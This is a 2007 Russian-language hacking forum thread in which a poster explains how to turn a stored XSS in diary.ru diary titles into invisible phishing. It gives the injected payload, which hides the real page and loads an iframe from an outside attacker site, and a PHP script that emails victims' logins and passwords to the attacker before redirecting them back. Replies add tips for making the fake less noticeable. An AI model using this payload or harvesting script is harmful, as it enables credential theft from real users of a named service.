Беспалевный фишинг

Discussion in 'Уязвимости' started by XenOtai, 11 Sep 2007.

  1. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Добрый вечер, с вами XenOtai.

    Если вы внимательно следите за темой активных хсс, то наверняка видели найденную мной активку на diary.ru. Напомню, что находится она в названии дневника. Положим, вы украли куки, но Вам хочется большего. То есть пароля.
    Но что, если он сложный и расшифровать его не удалось? Тогда первый выход, который приходит в голову – фишинг. Сделать фальшивую авторизацию, и как только чел зайдёт на свой дневник, его переадресует на сделанную нами форму.
    Одна проблемка – адрес-то в адресной строке сменится на другой, пусть и похожий. Вы наверняка задавались вопросом, как же этого можно избежать.
    Итак, заходим на дайри. Вбиваем <xss> в название дневника, бежим смотреть исходник – действительно, фильтрации 0. При этом наш тег выводится в параметре title:
    Code:
    <title>@дневники &mdash; <xss></title>
    Итак, что нам надо осуществить? Нам нужно:
    А) Фрейм в теле страницы.
    Б) Скрыть всё лишнее.
    Как скрыть лишнее? Оч просто:
    Code:
    <body style="visibility:hidden;">
    Так как даже если посередине страницы поставить </body></html>, браузер всё равно отображает дальше, но учитывает параметры, различные в каждом теге, то наш стиль прекрасненько отобразиться! Теперь фрейм! Обычный фрейм не годится, поскольку он исчезнет вместе с боди, нам нужен iframe.
    Итак, финальный код:

    HTML:
    </title><iframe src=http://fuckinghack.ru/auth.html location=top width="1003" height="1800" hspace=0 vspace=0><body style="visibility:hidden;">
    Подбираем ширину и высоту по нашей нужде, фрейм отображает страницу, которая отошлёт данные нашему скрипту, который, обработав их, отошлёт на нашу почту.
    Для тех, кто в танке, код скрипта (кто-то выкладывал на ачате :) ):

    PHP:
    <? 
    $to  "[email protected]", " //ваше мыло 
    $subject "Заход на diary.ru через ваш фейк"//тема сообщения 
    $message "Через ваш фейк на мыло зашли 
    Login: 
    $login
    Password: 
    $passwd"//само сообщение. Если хотите изменить, то только верхнюю строчку. 
    $otpravitel "M@IL Corp <[email protected]>"

    $headers  "MIME-Version: 1.0"
    $headers .= "Content-type: text/$tipe; charset=windows-1251"
    $headers .= "From: $otpravitel"
    mail($to$subject$message$headers); //отправляем сообщение 

    header("Location: http://diary.ru"); 
    //при правильном вводе пароля жертва будет переадресовываться на дайри, как будто ничего не было (хорошо бы устроить переадресацию на какой-нибудь дневник, потому что адресная строка останется прежней), но вам отправится пароль 
    exit; 
    ?>
    Чего мы достигли: Фейк на дневнике, с адресом дневника. Пример (оптимизировано под 1024х768):
    Code:
    http://diary.ru/~roboboy/
    «Удачи мне надо бежать а то я всю ночь не спал то что говорит что я убежал спать». (с) Dracula4ever

    XenOtai special for Antichat.ru
     
    mozzie, SWAT, Piflit and 2 others like this.
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Мдя... совсем для новичков, хотя это то же цель благородная... есть для энтих целей и более красивые методы... читай статьи на ачате... но мах репы поставлю, для начинающих мож быть полезно (увеличивает активность мозга)
     
  3. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    все вроде нормально только убери скролл а то сильно палится.. + до того можно через жаба скрипт получать разрешение экрана и делать фрейм на всю страницу
    тогда не будет трабл с пользовательскими разрешениями
     
    _________________________
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Можно в статьи добавить, а то здесь потеряется... а некотрым может быть полезно
     
  5. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Из статей перенесли сюда.